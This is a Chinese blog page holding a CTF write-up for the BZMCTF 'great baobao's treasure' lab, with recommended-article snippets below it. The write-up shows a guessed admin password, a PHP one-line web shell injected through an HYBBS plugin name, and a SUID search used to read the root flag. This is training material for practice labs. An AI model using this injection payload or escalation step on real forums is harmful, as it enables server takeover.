[BZMCTF]综合渗透部分 writeup

最新推荐文章于 2024-05-21 13:38:11 发布
最新推荐文章于 2024-05-21 13:38:11 发布
阅读量4.5k 收藏 15
点赞数 3
分类专栏: ctf 渗透 文章标签: 安全 web安全 ctf 渗透
不允许转载
本文链接:https://blog.csdn.net/weixin_46081055/article/details/122339539
版权

[BZMCTF]综合渗透部分 writeup

靶场:http://www.bmzclub.cn/challenges


伟大宝宝的宝藏

1.后台getshell

在这里插入图片描述
Powered by HYBBS Version 12.25.4(官方:http://bbs.hyphp.cn/ 、https://github.com/hyyyp/HYBBS2/releases/tag/HYBBS2.3)于是开始搜索HYBBS的漏洞,找到了这篇博客https://blog.csdn.net/weixin_50359752/article/details/108869507,需要用户登陆,但是自己注册的用户没有后台登陆的选项,还是需要管理员用户
在这里插入图片描述在这里插入图片描述
如果账户不存在会回显,可以推出存在admin账户,看了wp,发现原题有提示的

比赛题目:综合渗透区——《伟大宝宝的宝藏》
题目场景:初出茅庐的程序员伟大宝宝给公司做了一个网站,由于采用了通用的CMS所以他把存在的漏洞给修复好了,顺便做了些二次开发。
在他认为网站非常坚固的情况下,网站上线的第一天服务器就被黑客拿下来了,并且还打穿了公司内网导致公司损失重大。
他所在的公司立刻找到了你并给了你一个渗透测试项目,需要你来寻找黑客入侵的途径,并找到黑客是如何获取/root/目录下的flag文件信息的。

社工密码字典在线生成 https://api.xiaobaibk.com/lab/guess/
在这里插入图片描述
得到密码baobao123456789
在这里插入图片描述在这里插入图片描述
上传模板zip没有反应,后来发现插件名也可以命令执行,新建插件,插件名111',phpinfo(),//,然后植入一句话111', @eval($_POST['g']),//
在这里插入图片描述

在这里插入图片描述
但是具体找存放插件名的php文件需要自己本地试一下,/Plugin/111/conf.php
在这里插入图片描述

2.suid提权

尝试查找具有root权限的SUID的可执行文件

find / -user root -perm -4000 -print 2>/dev/null

在这里插入图片描述
xxd /root/flag

最低0.47元/天 解锁文章
shu天
关注
  • 3
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
GKCTF2021 ✖ DASCTF应急挑战杯 部分WP
Le1a's Blog
06-27 999
Misc 你知道apng吗 下载附件得到girl.apng,用apngdis_gui分解得到每一帧的png图片 分别在2,18,26发现二维码。其中18,26可以直接扫描得到-ad20和-0327-288a235370ea}。图片2是扭曲的二维码,但可以用ps拖正 扫描得到flag{a3c7e4e5,最后在第十张图片的红色通道1中得到二维码 扫描得到-9b9d,所以flag为 flag{a3c7e4e5-9b9d-ad20-0327-288a235370ea} 银杏岛の奇妙冒险 下载附件,打开exe,
AWD靶机实战第一天:读php源码找漏洞
2203_75839317的博客
04-09 787
首先是一个条件语句,判断输入的c参数的值是否是只由字母数字和下划线组成,或者,如果根目录下的/lib/文件夹下没有输入的参数与.php拼接起来的文件,满足其中一个都会退出并输出hack.如果不满足if的条件,那么else就会包含这个新的文件名,并且返回这个实例化的类。,那就是永远为假,所以说只会执行else,else里面有一个执行php代码的函数eval,所以这个函数将会执行$obj类里面的传入的方法,url上面写的是c=user&a=home。
HYBBS存在PHP多语言文件包含漏洞
最新发布
weixin_43167326的博客
05-21 935
该系统是轻论坛开发和使用的平台,,基于MVC框架,支持手机APP客户端。提供了各种插件和模板,可以增强论坛功。该框架是模仿ThinkPHP进行构建的项目。同时由于该项目自动开启多语言功能,所以攻击者可以构造参数进行任意PHP文件包含。
CTF-AWD-Yunnan_1防守和攻击
御七彩虹猫
03-24 2626
CTF-AWD-Yunnan_1防守和攻击
CTF综合靶场渗透系列-Billu_b0x
lza20001103的博客
10-11 3779
CTF综合靶场渗透系列-Billu_b0x
CTF AWD靶场搭建和第一题题解
weixin_46578840的博客
11-17 5042
首先安装docker环境 添加GPG密钥并添加更新源 curl -fsSL https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/debian/gpg | sudo apt-key add - echo 'deb https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/debian/ buster stable' | sudo tee /etc/apt/sources.list.d/docker.list
web渗透writeup
09-11
【知识点详解】 1. SQL注入漏洞 SQL注入是一种常见的安全漏洞,允许攻击者通过在输入字段中插入恶意SQL代码来操纵数据库查询。...`这条SQL语句没有对用户输入的$user变量进行任何过滤或转义,这使得攻击者可以通过...
2023 强网杯 Writeup
01-29
CTF Writeup 2023 强网杯 Writeup 是一篇关于 Capture The Flag(CTF)的 writeup,内容涵盖了多个挑战题目,涉及到 Python、 Cryptography、Reverse Engineering、Web 等多个领域。下面是对每个挑战题目的详细分析...
XDCTF2014部分官方Writeup.doc
09-30
在访问特定的URL后,可以看到一个新的Python文件newapp.py的部分内容。关键在于,通过编写简单的爬虫或者使用Burp Suite工具,收集所有可能的文件内容。在这个过程中,找到了一个名为xdctf的函数,当特定条件满足时...
[SECT2019] —writeup撰写.docx
11-28
writeup CTF
ctf_writeup:来自 Balsn 的 CTF 文章
08-03
Balsn CTF 报道Balsn 是来自台湾的 CTF 团队,成立于 2016 。我们积极参与 CTF 比赛,并发表有关挑战的文章。 在我们的 GitHub 存储库中,这些文章采用 markdown + kaTeX 格式。 有关更多信息,请参阅。...
wms仓储管理系统 v1.0
10-09
欢迎sqlgun-wms仓储后台管理系统! wms系统是适用于仓库货品出入库操作,库存查询的定向生产系统! 系统架构:mysql,CI,jqueryUI 管理员账号密码:admin:admin mysql数据库:新建wms库, 字
2019 5 11 防灾科技学院应急挑战杯大学生网络安全邀请赛 AWD 靶机题目。.zip
11-09
挑战杯大赛相关代码、设计文档、使用说明,供参考 挑战杯大赛相关代码、设计文档、使用说明,供参考 挑战杯大赛相关代码、设计文档、使用说明,供参考 挑战杯大赛相关代码、设计文档、使用说明,供参考 挑战杯大赛相关代码、设计文档、使用说明,供参考 挑战杯大赛相关代码、设计文档、使用说明,供参考 挑战杯大赛相关代码、设计文档、使用说明,供参考 挑战杯大赛相关代码、设计文档、使用说明,供参考 挑战杯大赛相关代码、设计文档、使用说明,供参考 挑战杯大赛相关代码、设计文档、使用说明,供参考 挑战杯大赛相关代码、设计文档、使用说明,供参考 挑战杯大赛相关代码、设计文档、使用说明,供参考 挑战杯大赛相关代码、设计文档、使用说明,供参考 挑战杯大赛相关代码、设计文档、使用说明,供参考 挑战杯大赛相关代码、设计文档、使用说明,供参考 挑战杯大赛相关代码、设计文档、使用说明,供参考 挑战杯大赛相关代码、设计文档、使用说明,供参考 挑战杯大赛相关代码、设计文档、使用说明,供参考 挑战杯大赛相关代码、设计文档、使用说明,供参考 挑战杯大赛相关代码、设计文档、使用说明,供参考 挑战杯大赛相关代码、设计文档、使用说明,供参考
YJTZB_2019:2019应急挑战杯大学生网络安全邀请赛转型原始码及writeUP
03-23
2019应急挑战杯 2019应急挑战杯大学生网络安全邀请赛转型原始码及writeUP
GKCTF2021-官方WriteUp.pdf
07-06
GKCTF2021-官方WriteUp.pdf
古典加密writeup
01-05
CTF时遇到的古典加密的问题,自己写的writeup,信息安全专业的
sql注入实战1
GUN_C的博客
09-13 319
解密flag 一.测试阶段 进上述网站,测试检查问题方向 ①数字型注入 测试当输入的参数为整形时,如果存在注入漏洞,可以认为是数字型注入。 ②字符型注入 加入单引号之后看是否会报错,如果会报错的话进行下一步报错型注入 二.利用sqlmap查找SQL注入漏洞 1.安装sqlmap 下载sqlmap相关安装包后解压 将sqlmap复制到python安装目录下,在cmd中输入命令 sqlmap.py -h 安装 2.检查注入 ①GET注入 连接 查看所有数据库 (注意是要破解哪一个,也可一个一个
AWD:web_yunnan_1
qq_38618396的博客
08-27 1302
0x00 环境搭建 1、进入 cd awd-platform-master 2、创建赛题和队伍数量: 3、启动 4、查看SSH密码 5、查看到队伍映射的端口 6、访问端口: 7、同样可以使用ssh账户登录自己的服务器,下载对应的源文件 0x01 漏洞&修复 任意文件下载 漏洞挖掘 1、扫描目录:扫描了一下目录,没有发现有价值的东西,查看了一下源码发现后台目录 2、登录该目录: 3、直接使用弱口令,admin/admin即可登录 4、在志下载处,发现可以下载log,使用bp和wir
guns框架和MySQL匹配_Guns(开源后台管理系统框架)实战(一)——开发环境搭建...
weixin_42396174的博客
02-05 751
1. 开发环境搭建1.1. 开发环境要求JDK 1.8+Eclipse(或IntelliJ IDEA等)Tomcat(或其他中间件)MavenMySQLGit 可选1.2. 配置MavenGuns使用SpringBoot,SpringBoot推荐使用Maven管理项目,因此搭建Guns环境时,首先安装配置Maven。Maven的安装可百度学习或参照“参考引用”内容,由于默认的Maven仓库在国外,...
iscc2015官方writeup
09-06
iscc2015是国际信号与通信会议(International Symposium on Communication and Information Technologies)的官方writeup,在这个writeup中,主要回顾了iscc2015会议的主要内容和成果。 iscc2015会议是由IEEE(Institute of Electrical and Electronics Engineers)主办的,旨在聚集来自全球的学者、研究人员和专业人士,共同探讨和交流关于通信和信息技术领域的最新研究和发展。 这个writeup首先介绍了iscc2015会议的背景和目标,提及了该会议为促进学术界和工业界之间的合作、创新和知识交流所做的努力。接着,该writeup详细描述了iscc2015会议的主要议题,包括通信网络、无线通信、数据通信和网络安全等方面。此外,还列举了一些重要的研究课题和领域,如物联网、云计算、移动通信和多媒体通信等。 iscc2015的writeup还总结了会议期间的重要活动和成果。这些活动包括学术论文的研讨会和展示、专题演讲、研讨会和研究项目的发布等。会议期间,各个领域的专家和学者积极参与并互相交流了关于通信和信息技术领域的最新研究成果和创新理念。 最后,iscc2015的官方writeup总结了会议的收获和影响。该会议为全球通信和信息技术领域的研究人员和专业人士提供了一个交流和合作的平台,推动了相关领域的发展和创新。此外,与会者还从中获得了有关新技术、新方法和最佳实践的信息和经验。 总之,iscc2015官方writeup回顾了这个国际会议的主要内容和成果,强调了其在通信和信息技术领域的重要性和影响。通过促进学术界和工业界之间的交流与合作,这个会议为促进全球通信和信息技术领域的发展做出了贡献。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

shu天

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值